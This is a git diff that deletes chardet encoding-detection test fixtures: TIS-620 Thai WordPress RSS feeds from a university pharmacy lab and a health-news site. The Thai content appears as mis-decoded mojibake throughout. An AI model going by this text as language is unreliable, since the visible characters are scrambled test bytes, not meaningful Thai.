-§ׂ¹÷ֳװ¡ֳַׂװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ א»ח¹ֻ¹טֲַ§ׂ¹¢ֽ§₪³׀אְׁ×ָׂµֳל ֱַֻׂװ·ֲֲֵׁׂ¢ֽ¹ב¡ט¹ µׁי§¢ײי¹אֱ׳טֽא´׳ֽ¹µ״ֵׂ₪ֱ ¾.ָ.2533 ֱױַׁµ¶״»ֳ׀§₪לד¹¡ֳׂ¨ׁ´µׁי§¢ײי¹´ׁ§¹ױי -• א»ח¹ָ¹ֲלֱֳַ¡ֳׂדֻי÷ֳװ¡ֳׂא₪ֳ׳טֽ§ֱ׳ַֽװ·ֲָׂׂµֳל א¾׳טֽֽ׃¹ֲַ»ֳ׀גֲ×¹לבֵ׀א¾װטֱ»ֳ׀װ·¸װְׂ¾·ׂ§´יׂ¹ַװ×ׂ¡ֳׂ ¡ֳׂאֳױֲ¹¡ֳֽׂ¹בֵ׀¡ֳׂ·׃ַװ¨ֲׁ¢ֽ§¹ׁ¡ָײ¡ֹׂ ₪³ׂ¨ֲֳׂלבֵ׀÷״₪ֵׂ¡ֳ·ׁי§ְֲׂד¹בֵ׀¹ֽ¡₪³׀אְׁ×ָׂµֳל -• א»ח¹בֵֻט§·ױטדֻי÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂב¡ט×״ֱ×¹בֵ׀ׁ§₪ֱ - -ַװֲׁ·ָׁ¹ל - - - -א»ח¹¼י¹׃ד¹´יׂ¹¡ֳׂדֻי÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀¡ֳׂµֳַ¨ַװא₪ֳׂ׀ֻל·ױטֱױֱׂµֳ°ׂ¹ד¹ֳ׀´ׁ÷ׂ¡ֵ א»ח¹·ױטֱֲֳֽׁ÷¢ֽ§×״ֱ×¹בֵ׀ׁ§₪ֱ - -¾ׁ¹¸¡װ¨ - -- ¡ֳׂדֻי÷ֳװ¡ֳׂ·ׂ§´יׂ¹ַװ×ׂ¡ֳׂא¾׳טֽ¾ׁ²¹ׂ₪״³ְׂ¾×ױַװµבֵ׀ב¡יה¢»ׁ­ֻׂדֻיב¡ט×״ֱ×¹בֵ׀ׁ§₪ֱ -- ¹ׁ÷¹״¹¡ֳׂאֳױֲ¹¡ֳֽׂ¹א¾׳טֽ¡ֳׂ¼ֵװµ÷ׁ³±װµד¹₪³׀אְׁ×ָׂµֳל -- ¹ׁ÷¹״¹¡ֳׂ´׃א¹װ¹§ׂ¹ַװ¨ֲׁ¢ֽ§₪³ׂ¨ֲֳׂל ¹ׁ¡ָײ¡ֹׂבֵ׀÷״₪ֵׂ¡ֳ -- א»ח¹ֻ¹טֲַ§ׂ¹·ױטֱֳׂׂ¶ֳיׂ§ֲֳׂה´יא¾׳טֽ¡ֳׂ¾ײט§µ¹אֽ§ -- ¾ׁ²¹ֳׂ׀÷÷¡ֳׂ÷ֳװֳֻׂ§ׂ¹ְֲׂד¹ֽ§₪ל¡ֳדֻיֱױ»ֳ׀װ·¸װְׂ¾§״´ - - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=2 - - - ג₪ֳ§ֳיׂ§ֻ¹טֲַ§ׂ¹ - http://pharmacy.kku.ac.th/centerlab/index.php?p=4 - http://pharmacy.kku.ac.th/centerlab/index.php?p=4#comments - Fri, 21 Jan 2005 08:08:39 +0000 - - ג₪ֳ§ֳיׂ§ֻ¹טֲַ§ׂ¹ http://pharmacy.kku.ac.th/centerlab/index.php?p=4 - ג₪ֳ§ֳיׂ§ֻ¹טֲַ§ׂ¹ - - - - - - - - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=4 - - - §ׂ¹´יׂ¹÷ֳװ¡ֳׂ - http://pharmacy.kku.ac.th/centerlab/index.php?p=3 - http://pharmacy.kku.ac.th/centerlab/index.php?p=3#comments - Fri, 21 Jan 2005 08:05:12 +0000 - - ¡ֳׂדֻי÷ֳװ¡ֳׂ http://pharmacy.kku.ac.th/centerlab/index.php?p=3 - §ׂ¹÷ֳװ¡ֳׂ - -´יׂ¹¡ֳׂµֳַ¨ַװא₪ֳׂ׀ֻל - - - -•¡ֳׂµֳַ¨ַװא₪ֳׂ׀ֻל₪״³ְׂ¾ֲׂ׃אֳח¨ֳ»ג´ֲֽיׂ§ֽװ§µֱֱׂׂµֳ°ׂ¹ׂ¡ֵדֻי¡ׁ÷·ׂ§גֳ§¾ֲׂ÷ֵׂבֵ׀ֻ¹טֲַ§ׂ¹אֽ¡×¹ «ײט§»ֳ׀¡ֽ÷´יֲַ¡ֳֻׂׂ»ֳװֱׂ³µֲַׁׂ׃₪ׁ­ (Active ingredient), ₪ֱֱַׂט׃אֱֽ¢ֽ§µֲַׁׂ (Content Uniformity), ₪טׂ¡ֳֵׂ׀ֲֵׂ¢ֽ§ֲׂ (Dissolution Test), ¡ֳׂבµ¡µַׁ¢ֽ§ֲׂ (Disintegration), ¡ֳׂ·´ֽ÷₪ֱַׂ₪§ְׂ¾¢ֽ§ֲׂ (Stability Test) בֵ׀¡ֳַׂװא₪ֳׂ׀ֻלֻׂ¢¹ׂ´ֽ¹״ְׂ₪ֳׂג´ֲד×יא₪ֳ׳טֽ§ Coulter Counter Multisizer -•¾ׁ²¹ַׂװ¸ױַװא₪ֳׂ׀ֻלֲׂ׃אֳח¨ֳ»¨ׂ¡÷ֳװֹׁ·אֽ¡×¹בֵ׀ֻ¹טֲַ§ׂ¹ֽ׳ט¹ז -•¡ֳַׂװא₪ֳׂ׀ֻלֻׂ»ֳװֱׂ³¢ֽ§ֳׂאµױֲֲֳֽ´לד¹ֱ״¹ה¾ֳ א×ט¹ ֲֵׂ¡¡ֵֽ¹ -•µֳַ¨ֻׂ»ֳװֱׂ³גֵֻ׀ֻ¹ׁ¡ד¹ֱ״¹ה¾ֳבֵ׀ד¹×ױַַׁµ¶״ א×ט¹ גֵֻ׀µ׀¡ׁטַ ֵװא·ױֱֲ ·ֽ§ב´§ ׁ§¡׀ױ א»ח¹µי¹ -•µֳַ¨ֻׂ»ֳװֱׂ³בֵֽ¡ֽ־ֵֽלד¹אֵ׳ֽ´ -•¡ֳׂµֳַ¨ַׁ´ֳ׀´ׁ÷ֲׂבֵ׀ֳׂ¾װֹד¹אֵ׳ֽ´בֵ׀×ױַַׁµ¶״¢ֽ§גֳ§¾ֲׂ÷ֵׂ·ׁי§ְׂ₪ֳׁ°בֵ׀אֽ¡×¹ -•¡ֳׂµֳַ¨ֳֻׂׂ¾װֹ¡ֵ״טֱ Carbamate Organophosphate בֵ׀ Organochorine א×װ§₪״³ְׂ¾ד¹»ַׁׂ׀בֵ׀¹י׃ֵיׂ§¡ֳ׀א¾ׂ׀ - ... - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=3 - - - µװ´µטֽ§ׂ¹÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ - http://pharmacy.kku.ac.th/centerlab/index.php?p=5 - http://pharmacy.kku.ac.th/centerlab/index.php?p=5#comments - Fri, 21 Jan 2005 04:45:12 +0000 - - µװ´µטֽ http://pharmacy.kku.ac.th/centerlab/index.php?p=5 - - -µװ´µטֽ¢ֳֽׁ÷÷ֳװ¡ֳׂבֵ׀ֲֳֵׂ׀אֽױֲ´א¾װטֱאµװֱה´י·ױט -§ׂ¹÷ֳװ¡ֳַׂװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ -₪³׀אְׁ×ָׂµֳל ֱַֻׂװ·ֲֲֵׁׂ¢ֽ¹ב¡ט¹ -ֽ.אֱ׳ֽ§ ¨.¢ֽ¹ב¡ט¹ 40002 -ג·ֳ. 0-4334-8354, ב¿¡«ל. 0-4334-8354 -א÷ֳֽלְֲׂד¹ 441, 2589 -http//pharmacy.kku.ac.th - - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=5 - - - diff --git a/chardet/tests/TIS-620/pharmacy.kku.ac.th.healthinfo-ne.xml b/chardet/tests/TIS-620/pharmacy.kku.ac.th.healthinfo-ne.xml deleted file mode 100644 index 4319737..0000000 --- a/chardet/tests/TIS-620/pharmacy.kku.ac.th.healthinfo-ne.xml +++ /dev/null @@ -1,273 +0,0 @@ - - - - - - - ג₪ֳ§¡ֳׂ¼ׁ¡»ֵֽ´ְֲׁ¨ׂ¡ֳׂ¾װֹ ¨ׁ§ַֻׁ´¢ֽ¹ב¡ט¹ - http://pharmacy.kku.ac.th/healthinfo-ne - babblings! - Copyright 2004 - Sun, 07 Nov 2004 04:55:00 +0000 - http://wordpress.org/?v=1.2 - - - ¼ֵָײ¡ֹׂבֵֻט§ב¾ֳט “ב₪´אֱױֱֲ” 2 אֱֻ׳ֽ§ׁ§¡׀ױ¼יµיֽ§§ֲׁ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=405 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=405#comments - Sun, 07 Nov 2004 04:55:00 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=405 - ֱֲֻׂאֻµ״ : ֻ¹טֲַא©¾ׂ׀¡װ¨µֳַ¨ֽ÷בֵ׀»ֳ׀אֱװ¹¡ֳׂ»¹א»׳יֽ¹¢ֽ§ֳׂב₪´אֱױֱֲד¹¾׳י¹·ױטֵ״טֱ¹י׃ֻיֲַבֱטµַׂ ֽ.בֱטֽ´ ¨.µׂ¡ ¡ֳ׀·ֳַ§·ֳׁ¾ֲׂ¡ֳ¸ֱֳֳ×ׂµװבֵ׀װט§בַ´ֵיֱֽ(·.) ה´יֳ״»¼ֵ¡ֳֳׂ׀÷״בֵֻט§¡׃א¹װ´¢ֽ§»ׁ­ֻׂ¡ֳׂ»¹א»׳יֽ¹¢ֽ§ֳׂב₪´אֱױֱֲד¹µֳ׀¡ֽ¹´װ¹ ֵ׃¹י׃בֱטµַׂ ׁµַל¹י׃ ¢יַׂ ֵֿֿ א¾׳טֲֳֽׂ§ׂ¹µטֽ·ױ»ֳ׀×״ֱ₪³׀·׃§ׂ¹א©¾ׂ׀¡װ¨ֿ «ײט§ֱױ¹ֲׂ»ֵֽ´»ֳ׀¾ ״ֳַׁ´ױ »ֵׁ´ ·. א»ח¹»ֳ׀¸ׂ¹אֱ׳טֽµי¹א´׳ֽ¹אֱֲֹׂ¹·ױט¼טׂ¹ֱׂ “ֱµװ×¹” אֻח¹ַטֱׂױֲֳֵׂ׀אֽױֲ´¹טׂ¹ד¨ג´ֲא©¾ׂ׀בֵֻט§·ױט¹טׂ§ֲׁ¨׀א»ח¹µי¹¡׃א¹װ´¢ֽ§»ׁ­ֻׂ ¨ײ§¢ֽב¹׀¹׃א¹ֽג´ֲׁ§א¢» - - ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=405 - - - ¾÷גֱאֵ¡״ֵב»ֵ¡»ֱֵֽד¹א¹׳יֽב´§ – ¹ֱ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=404 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=404#comments - Sun, 07 Nov 2004 04:52:49 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=404 - ¹ׁ¡ַװ¨ֲֳֻׁׁ°¾÷גֱאֵ¡״ֵד¹א¹׳יֽב´§בֵ׀¹ֱ «ײט§אֱ׳טֱֽ¹״ֲֹלֳׁ÷»ֳ׀·ׂ¹א¢יׂה»ֱױב¹ַג¹יֱ·ױט¨׀¾ׁ²¹ׂא»ח¹א¹׳יֽ§ֽ¡ה´י µֽ¡ֲי׃ְֲׁא§ױֲ÷¨ׂ¡¡ֳֳׁׂ÷»ֳ׀·ׂ¹ֳֻֽׂׂה¢ֱׁ¹ֽװטֱµַׁ - - ֳׂ»ֳ׀¡ֽ÷´ׁ§¡ֵטֱַׂױ×׳טֽאֳױֲ¡ַטׂ ¡ֳ´ה«אֵֽװ¡ ¾÷ֲֽט÷¹¼װַ¢ֽ§א«ֵֵלׁµַל בµטהֱט¾÷ד¹ֱ¹״ֲֹל בֵ׀ֽׂ¨¨׀א»ח¹אֻµ״¼ֵֻ¹ײט§·ױטֽ¸װ÷ֲׂה´יַטׂ ·׃הֱ¡ֳׂא»ֵױטֲ¹¶טֲׂא¹׳יֽאֲ׳טֽבֵ׀ֲַַֽׁ׀¨ׂ¡ׁµַלטֱ¹״ֲֹל ¶ײ§הֱט»ֳ׀÷¼ֵ׃אֳח¨ ג´ֲגֱאֵ¡״ֵ·ױט¾÷ד¹ׁµַל₪׳ֽ Neu5Gc ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=404 - - - ֽ¹ׂ₪µ¡ֽ§·״¹. ג»ֳט§דµֳַ¨ֽ÷ה´י? - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=403 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=403#comments - Sun, 07 Nov 2004 04:52:06 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=403 - ׃¹ׁ¡¡ֽ§·״¹¹ׁ÷¹״¹¡ֳֳׂיׂ§אֳװֱ״¢ְׂ¾ (.) ְֲׂדµי¡ֳׂ´׃א¹װ¹§ׂ¹´יֲַגֵב¡¹·ױטַטׂ “ֳיׂ§ ¹׃ «טֱֽ(ט§אֳװֱ״¢ְׂ¾ב·¹¡ֳֳׁׂ¡ֹׂ)” ֳֻ׳ֽ “ֳיׂ§״¢ְׂ¾א×װ§ֳ״¡ (הֱטֳֽדֻי»טֲַ¡טֽ¹ בֵיַ₪טֲֳֽׁ¡ֹׂ)” בֵ׀¡׃ֵׁ§¨׀ֱױֲֽׂ״₪ֳ÷ 3 »ױ ד¹א´׳ֽ¹אֱֲֹׂ¹¹ױי - - בֵ׀¡׃ֵׁ§µ¡א»ח¹¢טַַׂטֱׂױ¾ִµװ¡ֱֳֳטֽ¶ײ§₪ֱַׂהֱט×ֽ÷ֱׂ¾ׂ¡ֳֵֻ׳ֽ¡ֳׂא»װ´×טֽ§ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=403 - - - “¢¹ֱ¢÷א₪ױיֲַ” ¡ׁ÷ “א´ח¡ה·ֲ” ·׃ֲֽטׂ§הֳ?…..¨ײ§¨׀הֱטֱױ»ׁ­ֻׂ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=402 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=402#comments - Sun, 07 Nov 2004 04:50:44 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=402 - ֱֲׁ¡טֽ¹אֱ׳טֽ¡ֵטַׂ¶ײ§₪׃ “¢¹ֱא¨ח¡” ¨׀א»ח¹·ױטֳי¡ׁ¹´ױ ַטֱֲֻׂׂ¶ײ§ ¢¹ֱ¢ֽ§×ַׂ¨ױ¹ֳֻ׳ֽ “¢¹ֱ¢÷א₪ױיֲַ” (Snack) ·ױטֱױֵׁ¡ֹ³׀א»ח¹«ֽ§ֳֻ׳ֻֽטֽ´יֲַ¡ֳ׀´ֹׂ¿ׂ§ ֱױ₪״³₪טׂ·ׂ§ֳֻֽׂׂ¹יֲֽ א¾ֳׂ׀ֱׁ¡¨׀ֱױטַ¹»ֳ׀¡ֽ÷¢ֽ§ב»י§ ¹י׃µֵׂ בֵ׀¼§×ֳ «ײט§ֱױ₪ֱַׂבµ¡µטׂ§¡ׁ÷¢¹ֱה·ֲ·ױטֻטֽ´יֲַד÷µֽ§ ¡ֳ׀´ֹׂ´יׂ¹ ֳֻ׳ֽ¡ֳ׀´ֹׂב¡יַױµטׂ§ ז בֵ׀ֱױ₪״³₪טׂ·ׂ§ֱֳֻֽׂׂׂ¡¡ַטׂ - - ¢¹ֱא¨ח¡ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=402 - - - ֲֽ. ×ױי¼ֵµֳַ¨גֳ§§ׂ¹ֳֻֽׂׂה·ֲ ¾ְִֹֿׂ¼טׂ¹ֱׂµֳ°ׂ¹¨ױאֽחֱ¾ױ 80% - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=401 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=401#comments - Sun, 07 Nov 2004 04:49:34 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=401 - ¹.¾. ¶ׂ¾ֳ ַ§ֹלא¨ֳװ­ ֳֽ§אֵ¢ׂ¸װ¡ֳׂ₪³׀¡ֱֳֳ¡ֳֳֻֽׂׂׂבֵ׀ֲׂ (ֲֽ.) א»װ´א¼ֲ¶ײ§₪ֱַׂ₪׳÷ֻ¹יׂד¹¡ֳׂµֳַ¨ֽ÷ֱׂµֳ°ׂ¹¡ֳׂ¼ֵװµ·ױט´ױ (¨ױאֽחֱ¾ױ) גֳ§§ׂ¹¼ֵװµֳֻֽׂׂ 54 »ֳ׀אְ· -·ׁטַ»ֳ׀א·ָ µֱׂ¹גֲ÷ֲֳֻֽׂׂׂ»ֵֽ´ְֲׁ ¡ֳׂµֳַ¨ֽ÷גֳ§§ׂ¹¼ֵװµֳֻֽׂׂ₪ׂ´ַטׂ¨׀₪ֳ÷¶יַ¹ 100% ד¹א´׳ֽ¹¾ְִֹׂ₪ֱ 2547 ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=401 - - - ֵ¡ֲֽה·ֲ»ֵֽ´ְֲׁ¨ׂ¡¨״ֵװ¹·ֳױֲל - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=400 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=400#comments - Sun, 07 Nov 2004 04:49:05 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=400 - ֻׂ¡אֽטֲ¶ײ§¹י׃ֱ״¹ה¾ֳה·ֲ µֽ¹¹ױיד₪ֳז ¡חµיֽ§ֳי¨ׁ¡ ג´ֲא©¾ׂ׀ֱ״¹ה¾ֳ “¹י׃ֵ¡ֲֽ” - - “ֲֽ” א»ח¹הֱיֱ§₪ֵ·ױטֱױֱׂבµטג÷ֳׂ³ ¡װ¹ה´י·ׁי§ֵ¡בֵ׀ד÷ ד÷ֱֲֽױױא¢ױֲַא¢יֱֳ¢ֱאֵח¡¹יֲֽ ֱױ¡ֵװט¹א©¾ׂ׀ טַ¹דֻ­ט¹װֱֲ¹׃ֱׂ·׃ֻטֱֻֽ¡ ב¡§ֽטֱֽ ב¡§א¼ח´ - - ֵ¡ֲֽ¡װ¹ה´י·ׁי§״¡בֵ׀´װ÷ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=400 - - - אֽח¹ ¾ױ ַױ ¨״ֵװ¹·ֳױֲל¡׃¨ׁ´ָׁµֳ¾׳×¼יד×י»ֵֽ´ְֲׁהֱטא»ח¹ֽׁ¹µֲֳׂµטֽװט§בַ´ֵיֱֽ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=399 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=399#comments - Sun, 07 Nov 2004 04:47:43 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=399 - אֽח¹ ¾ױ ַױ (Nuclear polyhedrosis Virus) א»ח¹גֳ₪הֳַׁ·ױטא¡װ´¡ׁ÷בֱֵ§×¹װ´ֻ¹ײט§ ֱױ»ֳ׀װ·¸װְׂ¾ד¹¡ֳׂ·׃ֲֵׂבֱֵ§ָׁµֳ¾׳×ד¹¡ֵ״טֱא´ױֲַ¡ׁ¹ ֱֳׂׂ¶¾÷ה´יµֱׂבֵֻט§¸ֱֳֳ×ׂµװ ג´ֲא©¾ׂ׀ד¹בֵֻט§·ױטֱױ¡ֳֳׂ׀÷ׂ´¢ֽ§ֻ¹ֽ¹¨׃¹ַ¹ֱׂ¡ - - ¹ֲֽׂ״·ֲׁ א¡µ״¹״µװ ¹ׁ¡¡ױ¯ַװ·ֲׂ 8 ׃¹ׁ¡ַװ¨ֲׁבֵ׀¾ׁ²¹ׂ¡ֳׂ»ֳׂ÷ָׁµֳ¾׳× ¡ֱֳַװ×ׂ¡ֳׂא¡ֹµֳ א»װ´א¼ֲ¶ײ§·ױטֱׂד¹¡ֳׂ₪י¹¾÷א×׳יֽאֽח¹ ¾ױ ַױ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=399 - - - ¾÷גֽ¶ֳׂ¨ׂ¡ “אֱֵח´ֵ׃הֲ” ד×י»יֽ§¡ׁ¹¡ֳׂ¡טֽא¡װ´גֳ₪ֱ׀אֳח§ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=398 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=398#comments - Sun, 07 Nov 2004 04:47:08 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=398 - א»ח¹·ױט־׳ֽ־ׂד¹÷ֳֳ´ׂ¡ֵ״טֱה־ג«ֲֽט¾ׁ¡דֻ­ט¡ׁ÷§ׂ¹ַװ¨ֲׁ¢ֽ§µטׂ§»ֳ׀א·ָ·ױט₪י¹¾÷ַטׂ ד¹אֱֵח´ֽ§״ט¹ב´§ֱױֳׂ׀׃₪ׁ­·ױט×טֲַ´בֵ¼װַ¾ֳֳ³דֻיבµט§µײ§הֱטאֻױטֲֲַט¹ ¨¹אֱֵח´ֽ§״ט¹ב·÷¨׀ֱױֱֵ₪טֱׂׂ¡¡ַטׂא¹׳יֽה»אֲֵד¹¢³׀¹ׁי¹ אֵַׂ¹ױיאֱ׳ֽ§ה·ֲאֳׂ¡חֱױ§ׂ¹ַװ¨ֲׁא¡ױטֲַ¡ׁ÷אֳ׳טֽ§¹ױיא×ט¹¡ׁ¹ ·ַטׂהֱטד×טאֳ׳טֽ§₪ֱֲַַׂ₪ֱַׂ§ֱׂ. בµטא»ח¹¡ֳׂ₪י¹¾÷ֳׂ׀׃₪ׁ­·ױטֱױִ·¸װלµטֽµיׂ¹גֳ₪ֱ׀אֳח§ «ײט§¹ׁ÷א»ח¹¡ֳׂ₪י¹¾÷דֱֻטֵטׂ״´·ױט¹טׂ¨׀א»ח¹»ֳ׀גֲ×¹לµטַֽ§¡ֳׂב¾·ֲלה·ֲֳֻ׳ֽ¨׀ַטׂ¢ֽ§גֵ¡אֲֵ¡חה´י א¾ֳׂ׀ֲׁ§הֱטא₪ֱֲױד₪ֳָײ¡ַֹׂװ¨ֱֲׁׂ¡טֽ¹ - - ג´ֲאֳ׳טֽ§¹ױי ¹ֲֲׂ״·¸¹ׂ ״´א¨ֳװ­ ¹ׁ¡ָײ¡ֹׂג₪ֳ§¡ֳׂ»ֳװ­­ׂאֽ¡¡ׂ­¨¹ְׂװאֹ¡ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=398 - - - ב¹׀¡װ¹ “¾׳×-¼ׁ¡ “ ×טֲַ₪ֲֳֵׂיֽ¹ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=397 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=397#comments - Sun, 07 Nov 2004 04:46:36 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=397 - ֳֳַׂׂ “ֲֳׂׂד¨ה·ֲ” ¢ֽ§ֱֵ¹װ¸װֲׂד¨ה·ֲד¹¾ֳ׀÷ֱֳֳׂ×»¶ְֱׁל ©÷ׁ÷א´׳ֽ¹אֱֲֹׂ¹ 2547 א×װ­×ַ¹₪¹ה·ֲ÷ֳװגְ₪¾׳×¼ׁ¡ַ¹₪ֳַׁדֻיֽ´₪ֵיֽ§¡ׁ÷ְׂ¾ֽׂ¡ָׂ·ױטֱױ¼ֵµטֽ״¢ְׂ¾«ײט§»ֵ¡ה´יµֵֽ´»ױ ג´ֲא´׳ֽ¹אֱֲֹׂ¹ ֽׂ¡ֳָׂיֽ¹ ₪ֱֳַׂיֽ¹·׃דֻיא÷׳טֳֻֽֽׂׂ ֻ§״´ֻ§װ´ ֽׂ¨א»ח¹ֳיֽ¹ב´´¨ׂ¡₪ֱֳַׂיֽ¹ א¨ח÷₪ֽ ₪ֽבֻי§·׃דֻי¸ׂµ״ה¿¡׃אֳװ÷ ¾׳×¼ׁ¡·ױטדֻיִ·¸װלאֲח¹ה´יב¡ט µ׃ֵײ§ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=397 - - - “ׁ­ֵׁ¡ֹ³ל Q ¡ׁ÷¼ֵ¼ֵװµ¾׳×»ֵֽ´ְֲׁ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=396 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=396#comments - Sun, 07 Nov 2004 04:46:12 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=396 - •ֳֻֽׂׂ»ֵֽ´ְֲׁ¹׃ה·ֲט₪ֳַׁגֵ¡ - - »ֳ׀א·ָה·ֲ¹ׁ÷ה´יַטׂא»ח¹»ֳ׀א·ָ·ױטֱױ₪ֱֱַׁׂט§₪ׁט§בֵ׀ֱׁט¹₪§·ױט״´בֻט§ֻ¹ײט§ד¹´יׂ¹¢ֽ§¡ֳׂא»ח¹בֵֻט§¼ֵװµ¾׳×ֳֻֽׂׂ ¹ׁט¹א»ח¹¼ֱֵׂ¨ׂ¡₪ֱַֽׂ״´ֱֱ÷ֳ³ל¢ֽ§ ´װ¹ ¹י׃ בֵ׀₪ֱַׂאֱֻׂ׀ֱ¢ֽ§ְׂ¾ֽׂ¡ָׂ ¼ֱ¼ׂ¹¡ׁ÷₪ֱַׂ¢ֲׁ¹¢ׁ¹ב¢ח§¢ֽ§א¡ֹµֳ¡ֳה·ֲ ַטׂ¡ׁ¹ַטׂ»ֳ׀א·ָה·ֲא»ח¹בֵֻט§ֳֻֽׂׂ·ױטדֻ­ט·ױט״´בֻט§ֻ¹ײט§¢ֽ§גֵ¡אֲֵ·ױא´ױֲַ בֱי¡ֳ׀·ׁט§ֳׁ°÷ֵׂאֽ§¡חה´יµֳ׀ֻ¹ׁ¡¶ײ§÷·÷ׂ·ד¹טַ¹¹ױי ¨¹ֱױ¹גֲ÷ֲׂ·ױט¨׀ט§אֳװֱדֻי»ֳ׀א·ָה·ֲא»ח¹₪ֳַׁ¢ֽ§גֵ¡ «ײט§¹ׁט¹µיֽ§ֱֲֻׂ¶ײ§¡ֳֳׂיׂ§₪ֱֱַׁׂט¹ד¨דֻי¡ׁ÷¼י÷ֳװגְ₪·ׁטַגֵ¡´יֲַַטׂ ¾׳×ֳֻֽׂׂ¨ׂ¡»ֳ׀א·ָה·ֱֲױ₪ֱַׂ»ֵֽ´ְֲֲֽׁטׂ§ב·י¨ֳװ§ - -•¼ֵ¼ֵװµ¨ֽ§ה·ֲ»ֵֽ´ְֲׁב₪טהֻ¹ - - ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=396 - - - ¡״י§בֻי§……….¡ׁ÷ֳׂ¡ׁ¹÷´ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=395 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=395#comments - Sun, 07 Nov 2004 04:45:20 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=395 - ֲ׃¡״י§בֻי§ א»ח¹ֳֻֽֽׂׂױ¡×¹װ´ֻ¹ײט§·ױט¢ׂ´אױֲהֱטה´יד¹ַ§¢יַׂµיֱ …. - - ¹ֽ¡¨ׂ¡ֲ׃¡״י§בֻי§בֵיַ ¡״י§בֻי§ֲׁ§¹׃ֱׂ»ֳ׀¡ֽ÷ֳֻֽׂׂה´יֽױ¡ֲֵֻׂ×¹װ´ הֱטַטׂ¨׀א»ח¹µיֱ¨׳´ ¼ׁ´¼ׁ¡ ¼ׁ´ַ״י¹אי¹ ¼ׁ´ה·ֲ ¹י׃»ֵַֻׂׂ¹ ¹י׃¾ֳװ¡ בֵ׀ֽ׳ט¹ז ֽױ¡ֱׂ¡ֱֲׂ - - ·ױט¹װֱֲ¹׃ֱׂדטֳֻֽׂׂ¡חא¾ׂ׀¡״י§בֻי§ֱױױׁ¹ֲַ§ֱׂ ·׃דֻיֳֻֽׂׂ×ַ¹ֳׁ÷»ֳ׀·ׂ¹ בֵ׀ֱױֳ×ׂµװֳֽטֲֽ ¡ֱֳֳַװ¸ױ¡ֳׂ¼ֵװµ¡״י§בֻי§¹ׁי¹הֱטֲ״ט§ֲׂ¡ ... - http://pharmacy.kku.ac.th/healthinfo-ne/wp-commentsrss2.php?p=395 - - - ¾ֳװ¡¢ױיֻ¹ ….הֱטֽׁ¹µֲֳׂ - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=394 - http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=394#comments - Sun, 07 Nov 2004 04:43:29 +0000 - - ¢טַׂ״¢ְׂ¾ ×״´·ױט 5 http://pharmacy.kku.ac.th/healthinfo-ne/index.php?p=394 - 